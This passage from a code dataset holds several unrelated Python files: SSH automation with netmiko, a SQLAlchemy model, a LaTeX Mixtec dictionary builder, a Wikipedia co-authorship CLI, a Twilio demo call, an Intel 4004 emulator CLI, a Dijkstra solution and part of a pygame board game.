PROCESSED\")\n","repo_name":"mdsatria/npc_digital_tils","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37915658917","text":"import time\nfrom concurrent.futures import ThreadPoolExecutor, wait\nfrom datetime import datetime\nfrom netmiko import ConnectHandler\nfrom my_devices import device_list\n\ndef ssh_conn(a_device):\n net_connect = ConnectHandler(**a_device)\n return net_connect.find_prompt()\n\nif __name__ == '__main__':\n start_time = datetime.now()\n max_threads = 4\n\n pool = ThreadPoolExecutor(max_threads)\n\n future_list = []\n for a_device in device_list: \n future = pool.submit(ssh_conn, a_device)\n future_list.append(future)\n \n #wait until all pending threads are done, its similar to join\n wait(future_list)\n\n #creating a loop to fetch the values from the future_list\n for future in future_list:\n print('Result: '+ future.result())\n\n end_time = datetime.now()\n print('\\nTime taken:' + str(end_time - start_time))\n\n","repo_name":"abhinav2938/Kirk_python-course","sub_path":"class_ex/concurrency/thread_wait.py","file_name":"thread_wait.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44563609205","text":"from .db import db\nfrom sqlalchemy.sql import func\n\nclass Watch(db.Model):\n __tablename__ = 'watchs'\n\n id = db.Column(db.Integer, 
primary_key=True)\n watchlist_id = db.Column(db.Integer, db.ForeignKey('watchlists.id'))\n sneax_id = db.Column(db.Integer, db.ForeignKey('sneaxs.id'))\n created_at = db.Column(db.DateTime(timezone=True), server_default=func.now())\n updated_at = db.Column(db.DateTime(timezone=True), server_default=func.now())\n\n listwatch = db.relationship('Watchlist', back_populates='watch' )\n sneaker = db.relationship('Sneax')\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'watchlist_id': self.watchlist_id,\n 'sneax_id': self.sneax_id,\n }\n","repo_name":"Simonvargas/SneaX","sub_path":"app/models/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33757647975","text":"from tkinter import *\r\nimport os\r\nimport subprocess\r\nimport random\r\n\r\nSOURCE = 'MixtecDict'\r\nNAME = 'MixtecDictionary'\r\nFOLDER = 'Dictionary'\r\n\r\nLETTERCOLUMN = 4\r\nPARTOFSPEECHCOLUMN = 5\r\nPRONUNCIATIONCOLUMN = 3\r\n\r\nmaster = Tk()\r\n\r\ndef createFolder(directory):\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print ('Error: Creating directory. ' + directory)\r\n\r\ndef stringToList(someString):\r\n\t'''string with commas delimiting chunks to list'''\r\n\tresult = []\r\n\titem = ''\r\n\tfor char in someString: \r\n\t\tif char != ',':\r\n\t\t\titem += char\r\n\t\telse: \r\n\t\t\tresult += [item]\r\n\t\t\titem = ''\r\n\tresult += [item] \r\n\treturn result\r\n\r\ndef count(someString,someChars):\r\n\t'''return how many instances of \r\n\tsomeChars there are in someString'''\r\n\tresult = -1\t # start at -1 because there's 1 extra #\r\n\tfor char in someString:\r\n\t\tif char in someChars:\r\n\t\t\tresult += 1\r\n\treturn result \r\n\r\ndef categories(emptyList,listOfLists,column):\r\n\t'''Makes a list of the different categories found in a column'''\r\n\tfor entry in listOfLists:\r\n\t\tcat = entry[column]\r\n\t\tif any(z == cat for z in emptyList): \r\n\t\t\tpass\r\n\t\telse:\r\n\t\t\temptyList += [cat]\r\n\treturn emptyList\r\n\r\nf = open(SOURCE,'r')\r\n'''Makes a list of entries in f, with each entry converted into a list'''\r\nasList = []\r\nfor line in f:\r\n\tentry = stringToList(line)\r\n\tasList += [entry]\r\nf.close()\r\n\r\nLetters = []\r\n'''Makes a list of the different letters each word is categorized under'''\r\ncategories(Letters,asList,LETTERCOLUMN)\r\n\r\npartsOfSpeech = []\r\n'''Makes a list of the different parts of speech each word is categorized under'''\r\ncategories(partsOfSpeech,asList,PARTOFSPEECHCOLUMN)\r\n\r\nselectedPartsSpeech = []\r\n'''Make a list of selected parts of speech'''\r\nnumPartsOfSpeech = 1\r\nfor part in partsOfSpeech:\r\n\tvar = IntVar()\r\n\tcheckIt = Checkbutton(master, text=part, variable=var)\r\n\tcheckIt.grid(row=numPartsOfSpeech, sticky=W)\r\n\tcheckIt.select()\r\n\tselectedPartsSpeech += [var]\r\n\tnumPartsOfSpeech += 1\r\n\r\ndef buildDict():\r\n\tWanted = []\r\n\tnum = 0\r\n\tfor pick in selectedPartsSpeech:\r\n\t\tif pick.get() == 1:\r\n\t\t\tWanted += [partsOfSpeech[num]]\r\n\t\telse:\r\n\t\t\tpass\r\n\t\tnum += 1\r\n\t# makes a list of the desired parts of speech as Wanted\r\n\r\n\tnumOfWords = 0\r\n\r\n\tfor lett in Letters:\r\n\t\tfor entry in asList:\r\n\t\t\tif (entry[LETTERCOLUMN] == lett) and (entry[PARTOFSPEECHCOLUMN] in Wanted):\r\n\t\t\t\tnumOfWords += 1\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\tcreateFolder('./'+FOLDER+'/')\r\n\t# Creates a folder in the current 
directory called Dictionary\r\n\t\r\n\tg = open(FOLDER+'/'+NAME+'.tex','w')\r\n\r\n\tg.write('% '+NAME+'.tex\\n')\r\n\tg.write('\\\\documentclass[12pt]{article}\\n')\r\n\tg.write('\\\\usepackage[margin=1in]{geometry}\\n')\r\n\tg.write('\\\\usepackage{palatino}\\n')\r\n\tg.write('\\\\usepackage{setspace} % for line spacing\\n')\r\n\tg.write('\\\\usepackage{booktabs}\\n')\r\n\tg.write('\\\\usepackage{longtable}\\n')\r\n\tg.write('\\\\usepackage{array} % for defining a new column type\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('%\\\\renewcommand{\\\\familydefault}{\\\\sfdefault}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\newcolumntype{C}{>{\\\\bf}c}\\n')\r\n\tg.write('\\\\newcolumntype{A}{>{\\\\it}l}\\n')\r\n\tg.write('\\\\newcolumntype{T}{>{--\\ } l}\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('\\\\begin{document}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\title{')\r\n\tg.write(\"\\\\underline{tutu t\\\\`u'un s\\\\`av\\\\`i \\\\~nuu$\\\\star$ n\\\\`u\\\\`u$\\\\star$ yuk\\\\`u}\\\\\\\\\\n\")\r\n\tg.write('\\\\underline{Diccionario Mixteco de San Miguel Cuevas}\\\\\\\\\\n')\r\n\tg.write('Cuevas Mixtec Dictionary}\\n')\r\n\tg.write('\\\\author{CBDIO}\\n')\r\n\tg.write('% \\\\date{}\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\maketitle\\n')\r\n\tg.write('\\n')\r\n\tg.write('\\\\onehalfspacing\\n')\r\n\tg.write('\\n')\r\n\r\n\tg.write('\\\\begin{center}\\n')\r\n\tg.write('\\\\begin{longtable}{rl}\\n')\r\n\tg.write('\\\\toprule\\n')\r\n\tg.write('\\\\textbf{Selected categories}: & \\\\emph{'+', '.join(Wanted)+'}\\n')\r\n\tg.write('\\\\\\\\\\n')\r\n\tg.write('\\\\textbf{Number of words}: & \\\\emph{'+str(numOfWords)+'}\\n')\r\n\tg.write('\\\\\\\\\\n')\r\n\tg.write('\\\\bottomrule\\n')\r\n\tg.write('\\\\end{longtable}\\n')\r\n\tg.write('\\\\end{center}\\n')\r\n\tg.write('\\n')\t\r\n\r\n\tfor lett in Letters:\r\n\t\tg.write('\\\\section*{'+lett+'}\\n')\r\n\t\tg.write('\\n')\r\n\t\tg.write('\\\\begin{longtable}[l]{CATT}\\n')\r\n\t\tg.write('\\\\toprule\\n')\r\n\t\tfor entry in asList:\r\n\t\t\tif (entry[LETTERCOLUMN] == lett) and (entry[PARTOFSPEECHCOLUMN] in Wanted):\r\n\t\t\t\t# remove second part above for full dictionary\r\n\t\t\t\tg.write(entry[0])\r\n\t\t\t\tfor field in entry[PARTOFSPEECHCOLUMN:]:\r\n\t\t\t\t\tg.write(' & '+field)\r\n\t\t\t\tg.write('\\\\\\\\\\n')\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\tg.write('\\\\bottomrule\\n')\r\n\t\tg.write('\\\\end{longtable}\\n')\r\n\t\tg.write('\\n')\t\r\n\r\n\tg.write('\\\\end{document}'+'\\n')\r\n\r\n\tg.close()\r\n\r\n\tprint('fishihed '+NAME+'.tex')\r\n\r\n\tos.chdir(FOLDER)\r\n\t# Changes directory to Dictionary folder\r\n\tos.system('pdflatex '+NAME+'.tex')\r\n\t# Runs pdflatex on the tex file in dictionary folder\r\n\tsubprocess.Popen(\"%s %s\" % ('C:\\\\Program Files\\\\SumatraPDF\\\\SumatraPDF.exe', NAME+'.pdf'))\r\n\t# Runs pdflatex on the tex file in dictionary folder\r\n\tos.chdir(os.path.dirname(os.getcwd()))\r\n\t# Changes directory back to parent folder of Dictionary folder\r\n\r\n\tprint('building '+NAME+'.pdf now')\r\n\r\nLabel(master, text=\"Desired parts of speech:\").grid(row=0, sticky=W)\r\n\r\nButton(master, text='Build', command=buildDict).grid(row=numPartsOfSpeech+1, sticky=W, pady=4)\r\n\r\nButton(master, text='Quit', command=master.quit).grid(row=numPartsOfSpeech+2, sticky=W, 
pady=4)\r\n\r\nmainloop()","repo_name":"uchicagolinguist/mixtec","sub_path":"SelectPartsSpeech.py","file_name":"SelectPartsSpeech.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9205065715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport Importer\nimport Analyzer\nimport Processor\nimport Exporter\nimport create_db\n\n\ndef main():\n # create the top-level parser\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n title='possible subcommands', dest='command')\n subparsers.required = True\n\n # create the parser for the create command\n parser_create = subparsers.add_parser(\n 'create', help='Creates the database for wacot.')\n parser_create.set_defaults(func=wacot_create)\n\n # create the parser for the import command\n parser_import = subparsers.add_parser(\n 'import', help='Imports the data from the wikipedia dump.')\n parser_import.add_argument(\n '--from-dumps', choices=['xml', 'cat', 'all'],\n help=('Select from which dump files to import: '\n 'xml imports only from the XML dump, '\n 'cat imports only from the category and categorylink SQL files '\n 'and all imports from both. Default is all.'))\n parser_import.add_argument(\n '--only-import', action=\"store_true\",\n help=('Only imports the data but does not analyze it. '\n 'By default the data is analyzed after the import.'))\n parser_import.set_defaults(func=wacot_import, from_dumps='all')\n\n # create the parser for the analyze command\n parser_analyze = subparsers.add_parser(\n 'analyze', help=('Analyzes the data and computes the '\n 'contribution tables, bot flags, '\n 'contribution counts and edit_counts.'))\n parser_analyze.set_defaults(func=wacot_analyze)\n\n # create the parser for the process command\n parser_process = subparsers.add_parser(\n 'process', help='Processes the data to generate co-authorship tables.')\n parser_process.add_argument(\n 'object', choices=['article-similarities', 'category-similarities'],\n help=('Select if you want to compute co-authorship '\n 'for articles or categories'))\n parser_process.set_defaults(func=wacot_process)\n\n # create the parser for the export command\n parser_export = subparsers.add_parser(\n 'export', help='Creates the database for wacot.')\n parser_export.add_argument(\n 'object', choices=['article-similarities', 'category-similarities'],\n help=('Select if you want to export similarities '\n 'for articles or categories'))\n parser_export.add_argument(\n '--format', choices=['graphml', 'csv'],\n help='Select export format. 
Default is graphml.')\n parser_export.set_defaults(func=wacot_export, format='graphml')\n\n # parse the args and call the function for the selected command\n args = parser.parse_args()\n args.func(args)\n\n\ndef wacot_create(args):\n create_db.main()\n\n\ndef wacot_import(args):\n importer = Importer.Importer()\n if args.from_dumps == 'all' or args.from_dumps == 'xml':\n importer.import_xml()\n if args.from_dumps == 'all' or args.from_dumps == 'cat':\n importer.import_categories()\n if not args.only_import:\n analyzer = Analyzer.Analyzer()\n analyzer.compute_article_contributions()\n analyzer.compute_category_contributions()\n analyzer.compute_bot_flags()\n analyzer.count_article_contributions()\n analyzer.count_category_contributions()\n\n\ndef wacot_analyze(args):\n analyzer = Analyzer.Analyzer()\n analyzer.compute_article_contributions()\n analyzer.compute_category_contributions()\n analyzer.compute_bot_flags()\n analyzer.count_article_contributions()\n analyzer.count_category_contributions()\n\n\ndef wacot_process(args):\n processor = Processor.Processor()\n if args.object == 'article-similarities':\n processor.generate_article_co_authorship()\n elif args.object == 'category-similarities':\n processor.generate_category_co_authorship()\n\n\ndef wacot_export(args):\n exporter = Exporter.Exporter()\n if args.object == 'article-similarities':\n if args.format == 'graphml':\n exporter.export_article_similarities_to_graphml()\n elif args.format == 'csv':\n exporter.export_article_similarities_to_graphml()\n elif args.object == 'category-similarities':\n if args.format == 'graphml':\n exporter.export_category_similarities_to_graphml()\n elif args.format == 'csv':\n exporter.export_category_similarities_to_graphml()\n\n\nif (__name__ == \"__main__\"):\n main()\n","repo_name":"StefanoWoerner/wacot","sub_path":"wacot.py","file_name":"wacot.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73571015847","text":"import os\nfrom twilio.rest import Client\naccount_sid = os.environ['TWILIO_ACCOUNT_SID']\nauth_token = os.environ['TWILIO_AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\ncall = client.calls.create(\n twiml='AUTO WARRANTY INSURANCE',\n to=os.environ['MY_PHONE_NUMBER'], \n from_='+12672042695'\n )\n\nprint(call.sid)\n","repo_name":"elizabethsiegle/twilio-101-sms-voice-workshop","sub_path":"outbound-call.py","file_name":"outbound-call.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"6303077515","text":"# Import system libraries\nimport os\nimport sys\n\n# Import resources library (part of setuptools)\nimport pkg_resources\n\n# Import toml library\nimport toml\nfrom toml import TomlDecodeError\n\n# Import click library\nimport click\n\n# Import Pyntel4004 functionality\nfrom assembler.assemble import assemble\nfrom disassembler.disassemble import disassemble\nfrom executer.execute import execute\nfrom executer.exe_supporting import retrieve\nfrom hardware.processor import Processor\nfrom shared.shared import print_messages\n\n\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n\n\nclass CoreNotInstalled(Error):\n \"\"\"Exception for when Pyntel4004 is not installed\"\"\"\n\n\nclass ConfigFileNotFound(Error):\n \"\"\"Exception for when the configuration file specified cannot be found\"\"\"\n\n\nclass BadFormat(Error):\n \"\"\"Exception for when the 
configuration file is badly formatted\"\"\"\n\n\ndef excepthook(exc, value, traceback):\n print(value)\n\n\ndef check_quiet(quiet, configuration):\n if quiet is None:\n if \"quiet\" in configuration:\n quiet = configuration[\"quiet\"]\n else:\n quiet = False\n else:\n quiet = True\n return quiet\n\n\ndef check_exec(exec, configuration):\n if exec is None:\n if \"exec\" in configuration:\n exec = configuration[\"exec\"]\n else:\n exec = False\n else:\n exec = True\n return exec\n\n\ndef check_inst(inst):\n if inst is None:\n inst = 4096\n else:\n if inst < 1 or inst > 4096:\n raise click.BadOptionUsage(\"--inst\", \"Instructions should be\" +\n \"between 1 and 4096\")\n return inst\n\n\ndef check_monitor(monitor, configuration):\n if monitor is None:\n if \"monitor\" in configuration:\n monitor = configuration[\"monitor\"]\n else:\n monitor = False\n else:\n monitor = True\n return monitor\n\n\ndef check_dis_content(configuration, object, inst, labels):\n if \"object\" in configuration and object is None:\n object_file = configuration[\"object\"]\n if object_file is None:\n raise click.BadOptionUsage(\n \"--object/--config\", \"No object file specified\\n\")\n if \"inst\" in configuration and inst is None:\n inst = configuration[\"inst\"]\n if labels is False and \"labels\" in configuration:\n labels = configuration[\"labels\"]\n else:\n labels = True\n return object_file, inst, labels\n\n\ndef check_asm_content(configuration, input_file, output, type_type):\n if \"input\" in configuration and input_file is None:\n input_file = configuration[\"input\"]\n if \"output\" in configuration and output == 'default':\n output = configuration[\"output\"]\n if \"type\" in configuration and type_type == ('None',):\n type_type = configuration[\"type\"]\n if input_file is None and output == 'default' \\\n and type_type == ('None',):\n raise click.BadOptionUsage(\n \"--config\", \"Empty 'asm' section in configuration file\\n\")\n return input_file, output, type_type\n\n\ndef check_type(type_type):\n # Check --type parameters\n # Raise error if not valid\n good = True\n all_found = False\n for i in type_type:\n if i.upper() in ('ALL', ):\n all_found = True\n if i.upper() not in ('ALL', 'OBJ', 'H', 'BIN'):\n good = False\n if good is False:\n raise click.BadOptionUsage(\"--type\", \"Invalid output type specified\\n\")\n\n # Check --type parameters - ALL cannot be specified with others\n # Raise error if not valid\n if all_found:\n others = True\n for i in type_type:\n if i.upper() in ('OBJ', 'H', 'BIN'):\n others = False\n if others is False:\n raise click.BadOptionUsage(\"--type\", \"Cannot specify 'ALL' \" +\n \"with any others\\n\")\n\n\ndef getcoreversion():\n __core_version__ = 'Installed'\n try:\n __core_version__ = pkg_resources.require(core_name)[0].version\n except CoreNotInstalled:\n __core_version__ = 'Not Installed'\n else:\n __core_version__ = 'Installed but no legal version'\n return __core_version__\n\n\npackage = \"Pyntel4004-cli\"\ncore_name = 'Pyntel4004'\ncini = '\\n\\n' + core_name + ' core is not installed - use \\n\\n' + \\\n ' pip install ' + core_name + '\\n'\nmodule = os.path.basename(sys.argv[0])\n__version__ = pkg_resources.require(package)[0].version\n__core_version__ = getcoreversion()\nsys.excepthook = excepthook\n\n\n# ----------- Utility Functionality ----------- #\n\ndef get_config(toml_file: str):\n \"\"\"\n Retrieve a configuration file\n\n Parameters\n ----------\n toml_file: str, mandatory\n Name of the configuration file\n\n Returns\n -------\n configuration: str\n 
String containing the configuration data\n\n Raises\n ------\n ConfigFileNotFound - the file cannot be opened\n BadFormat - The configuration file is badly formatted TOML\n\n Notes\n -----\n N/A\n\n \"\"\"\n configuration = None\n try:\n _ = open(toml_file)\n except OSError as e:\n if str(e.strerror[0:12]) == 'No such file':\n raise ConfigFileNotFound('Error:Configuration file not found.')\n try:\n configuration = toml.load(toml_file)\n except (TypeError, TomlDecodeError):\n raise BadFormat('Badly formatted configuration file')\n return configuration\n\n\n# ----------- Check Functionality ----------- #\n\n\ndef is_core_installed(package_name: str):\n \"\"\"\n Check to see if the Pyntel4004 core is installed\n\n Parameters\n ----------\n package_name: str, mandatory\n Name of the Pyntel4004 core package\n\n Returns\n -------\n True - if the core package is installed\n False - if not\n\n Raises\n ------\n N/A\n\n Notes\n -----\n N/A\n\n \"\"\"\n import importlib.util\n spec = importlib.util.find_spec(package_name)\n if spec is None:\n return False\n else:\n return True\n\n\n# ----------- Main Functionality ----------- #\n\n\n@click.group()\n@click.help_option('--help', '-h')\n@click.version_option(__version__, '--version', '-v',\n prog_name=package + ' (' + module + ')',\n message='%(prog)s, Version %(version)s \\n' + core_name +\n ' ' + 'Version: ' + __core_version__ + '\\n' +\n 'Learn more at https://github.com/alshapton/Pyntel4004')\n@click.pass_context\ndef cli(ctx):\n '''\n Command Line Interface (CLI) for Pyntel4004,\n a virtual Intel© 4004 processor written in Python.\n\n Learn more at https://github.com/alshapton/Pyntel4004\n '''\n pass\n\n\n@cli.command()\n@click.option('--input', '-i',\n help='4004 assembler source code.',\n type=str, metavar='')\n@click.option('--output', '-o',\n help='4004 output file (without extension).', default='default',\n metavar='')\n@click.option('--exec', '-x', is_flag=True, help='Execute program',\n default=None)\n@click.option('--quiet', '-q', is_flag=True, default=None,\n help='Output on/off [either/or ]')\n@click.option('--monitor', '-m', is_flag=True, default=None,\n help='Monitor on/off [but not both]')\n@click.option('--type', '-t', multiple=True, default=['None'],\n metavar='',\n help='Multiple output types can be specified - bin/obj/h/ALL')\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef asm(input, output, exec, monitor, quiet, type, config):\n \"\"\"Assemble the input file\"\"\"\n # Eliminate the \"Shadowing\" of builtins\n input_file = input\n type_type = type\n\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n # Get configuration (override from command line if required)\n if config is not None:\n configuration = get_config(config)\n if \"asm\" in configuration:\n asm_configuration = configuration[\"asm\"]\n input_file, output, type_type = \\\n check_asm_content(asm_configuration, input_file,\n output, type_type)\n exec = check_exec(exec, asm_configuration)\n monitor = check_monitor(monitor, asm_configuration)\n quiet = check_quiet(quiet, asm_configuration)\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'asm' section in configuration file\\n\")\n\n # Create new instance of a processor\n chip = Processor()\n # Check exclusiveness of parameters\n # Raise an error if not allowed\n if quiet and monitor:\n raise click.BadParameter(\"Invalid Parameter Combination: \" +\n 
\"--quiet and --monitor cannot be used \" +\n \"together\\n\")\n # Check existence of --type parameter\n # Raise error if not present\n if type_type == ('None',):\n raise click.BadOptionUsage(\"--type\", \"No output type specified\\n\")\n check_type(type_type)\n result = assemble(input_file, output, chip, quiet, str(type_type))\n if result and exec:\n print_messages(quiet, 'EXEC', chip, '')\n did_execute = execute(chip, 'rom', 0, monitor, quiet)\n if did_execute:\n print_messages(quiet, 'BLANK', chip, '')\n print_messages(quiet, 'ACC', chip, '')\n print_messages(quiet, 'CARRY', chip, '')\n print_messages(quiet, 'BLANK', chip, '')\n\n\n@cli.command()\n@click.option('--object', '-o',\n help='4004 object or binary file (specify extension)',\n metavar='', type=str)\n@click.option('--inst', '-i',\n help='Instuctions to disassemble',\n metavar='',\n type=int)\n@click.option('--labels', '-l',\n help='Show label table',\n is_flag=True, default=False)\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef dis(object, inst, labels, config) -> None:\n \"\"\"Disassemble the input file\"\"\"\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n object_file = object\n if config is not None:\n configuration = get_config(config)\n if \"dis\" in configuration:\n dis_configuration = configuration[\"dis\"]\n object_file, inst, labels = check_dis_content(dis_configuration,\n object, inst, labels)\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'dis' section in configuration file\\n\")\n inst = check_inst(inst)\n # Create new instance of a processor\n chip = Processor()\n memory_space, _, lbls = retrieve(object_file, chip, False)\n disassemble(chip, memory_space, 0, inst, labels, lbls)\n\n\n@cli.command()\n@click.option('--object', '-o',\n help='4004 object or binary file (specify extension)',\n metavar='', type=str)\n@click.option('--quiet', '-q', is_flag=True,\n help='Output on/off')\n@click.option('--config', '-c', metavar='',\n help='Configuration file', default=None)\n@click.help_option('--help', '-h')\ndef exe(object, quiet, config):\n \"\"\"Execute the object file\"\"\"\n # Ensure that the core Pyntel4004 is installed\n # Exit if not\n if not is_core_installed(core_name):\n raise CoreNotInstalled(cini)\n if config is not None:\n configuration = get_config(config)\n object_file = object\n if \"exe\" in configuration:\n exe_configuration = configuration[\"exe\"]\n if \"object\" in exe_configuration and object_file is None:\n object_file = exe_configuration[\"object\"]\n quiet = check_quiet(quiet, exe_configuration)\n\n else:\n raise click.BadOptionUsage(\n \"--config\", \"No 'exe' section in configuration file\\n\")\n\n # Create new instance of a processor\n chip = Processor()\n result = retrieve(object_file, chip, quiet)\n memory_space = result[0]\n execute(chip, memory_space, 0, False, quiet)\n","repo_name":"alshapton/Pyntel4004-cli","sub_path":"4004cli.py","file_name":"4004cli.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2338092791","text":"# 문제: n(1≤n≤1,000)개의 도시가 있다. 그리고 한 도시에서 출발하여 다른 도시에 도착하는 m(1≤m≤100,000)개의 버스가 있다. 우리는 A번째 도시에서 B번째 도시까지 가는데 드는 버스 비용을 최소화 시키려고 한다. 그러면 A번째 도시에서 B번째 도시 까지 가는데 드는 최소비용과 경로를 출력하여라.\n# 항상 시작점에서 도착점으로의 경로가 존재한다.\n\n# 입력: 첫째 줄에 도시의 개수 n(1≤n≤1,000)이 주어지고 둘째 줄에는 버스의 개수 m(1≤m≤100,000)이 주어진다. 
그리고 셋째 줄부터 m+2줄까지 다음과 같은 버스의 정보가 주어진다. 먼저 처음에는 그 버스의 출발 도시의 번호가 주어진다. 그리고 그 다음에는 도착지의 도시 번호가 주어지고 또 그 버스 비용이 주어진다.\n# # 버스 비용은 0보다 크거나 같고, 100,000보다 작은 정수이다.\n# 그리고 m+3째 줄에는 우리가 구하고자 하는 구간 출발점의 도시번호와 도착점의 도시번호가 주어진다.\n\n# 출력: 첫째 줄에 출발 도시에서 도착 도시까지 가는데 드는 최소 비용을 출력한다.\n# 둘째 줄에는 그러한 최소 비용을 갖는 경로에 포함되어있는 도시의 개수를 출력한다. 출발 도시와 도착 도시도 포함한다.\n# 셋째 줄에는 최소 비용을 갖는 경로를 방문하는 도시 순서대로 출력한다.\n\nimport sys\nimport heapq\n\nn = int(sys.stdin.readline())\nm = int(sys.stdin.readline())\n\n# 버스 정류장과 각 도착지로의 비용을 저장해주는 dictionary\nbus_station = dict()\n\n# 버스 정류장 출발점 초기화\nfor i in range(n):\n bus_station[str(i)] = dict()\n\n# 출발지, 도착지, 비용을 받아서 bus_station에 저장해줌\nfor _ in range(m):\n From, End, Weight = map(int, sys.stdin.readline().split())\n\n if(str(End-1) in bus_station[str(From-1)]):\n bus_station[str(From-1)][str(End-1)\n ] = min(bus_station[str(From-1)][str(End-1)], Weight)\n else:\n bus_station[str(From-1)][str(End-1)] = Weight\n\n# 출발지점과 도착지점\nstart, end = map(int, sys.stdin.readline().split())\n\n# 도착지까지의 최소비용을 저장해주는 list\ncost = [sys.maxsize]*n\ncost[start-1] = 0\n# 도착지까지 최소비용으로 가게 해주는 루트를 저장해주는 list\nroute = [[start-1] for _ in range(n)]\n\n# 우선순위 큐 생성\nqueue = []\nheapq.heappush(queue, [start-1, cost[start-1], route[start-1]])\n\nwhile(queue):\n cur_station, cur_cost, cur_route = heapq.heappop(queue)\n\n if(cost[cur_station] < cur_cost):\n continue\n\n for adj, adj_cost in bus_station[str(cur_station)].items():\n c = cur_cost + adj_cost\n\n # c가 기존의 저장되어있는 비용보다 작으면 cost와 route를 최신화 해주고 우선순위 큐에 넣어준다.\n if(c < cost[int(adj)]):\n cost[int(adj)] = c\n route[int(adj)] = cur_route + [int(adj)]\n heapq.heappush(queue, [int(adj), cost[int(adj)], route[int(adj)]])\n\n# 최소 비용\nprint(cost[end-1])\n# 최소 비용으로 가는데 거치는 정류장 수\nprint(len(route[end-1]))\n# 최소 비용으로 가는 정류장을 순서대로 풀력\nfor i in route[end-1]:\n print(i+1, end=' ')\n","repo_name":"97DongHyeokOH/Algorithm_Study","sub_path":"BAEKJOON/Practice/다익스트라/11779.py","file_name":"11779.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74235451688","text":"import sys\n\nimport pygame\n\nfrom NineMensMorris_version7 import Game_Functions as Game_Functions\n\nDEBUG = True\n# Global Variables\nboard = Game_Functions()\npygame.font.init() # you have to call this at the start, \n # if you want to use this module.\nmyfont = pygame.font.SysFont('Arial', 18)\n# Print the positions, player turn, active mills, remaining turns, and permissible moves\nprint(\"Positions:\", board.get_positions())\nprint(\"Player Turn:\", board.get_player_turn())\nprint(\"Active Mills:\", board.get_active_mills())\nprint(\"Remaining Turns:\", board.get_remaining_turns())\nprint(\"Permissible Moves:\", board.get_permissible_moves())\n\n# Initialize pygame\nprint(\" calling pygame.init()\")\npygame.init()\nprint(\"pygame initialized\")\n# Set the size of the screen\nscreen = pygame.display.set_mode((600, 750))\n\npygame.display.set_caption(\"Nine Men Morris\")\nprint(\"game window initialized\")\n# nine mens morris board image \nboardImg = pygame.image.load('morrisbig.png') \n# avatar images\nleafImg = pygame.image.load('player1_30x30.png')\nfireImg = pygame.image.load('player2_30x30.png')\nhighImg = pygame.image.load('high.png')\nroboImg = pygame.image.load('robo1.png')\n# coordinates of each board position in Board and corresponding position in the nine mens morris board image\nprint(\"images loaded\")\ncoords = {\n 0: (22, 22, 120, 770),\n 1: (230, 22, 820, 770),\n 2: (450, 22, 230, 660),\n 3: 
(22, 240, 710, 660),\n 4: (450, 240, 350, 540),\n 5: (22, 450, 590, 540),\n 6: (230, 450, 120, 425),\n 7: (450, 450, 230, 425),\n 8: (95, 95, 350, 425),\n 9: (230, 95, 590, 425),\n 10: (380, 95, 710, 425),\n 11: (95, 240, 820, 425),\n 12: (380, 240, 350, 310),\n 13: (95, 378, 470, 310),\n 14: (230, 378, 590, 310),\n 15: (380, 378, 230, 190),\n 16: (162, 169, 470, 190),\n 17: (230, 169, 710, 190),\n 18: (308, 169, 120, 80),\n 19: (162, 240, 470, 80),\n 20: (308, 240, 820, 80),\n 21: (162, 308, 415, 790),\n 22: (230, 308, 430, 680),\n 23: (308, 308, 430, 575)\n}\n# coordinates of each clickable position\n# mul = 500 / 843\n# clickables = [pygame.Rect(mul * c[0], mul * c[1], 35, 35) for c in coords.values()]\nclickables = [pygame.Rect(c[0], c[1], 30, 30) for c in coords.values()]\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n\n# Functions to draw the game state\ndef draw_board(screen, board_img, positions, coords):\n try:\n # Draw the background board\n screen.blit(board_img.convert(), (0, 0))\n # Draw boarders around the clickable areas\n if DEBUG:\n for rect in clickables:\n pygame.draw.rect(screen, BLACK, rect, 1)\n \n # Draw the pieces on the board\n for pos, value in enumerate(positions):\n x, y, _, _ = coords[pos]\n if value == 1:\n screen.blit(leafImg.convert_alpha(), (x, y))\n elif value == 2:\n screen.blit(fireImg.convert_alpha(), (x, y))\n except 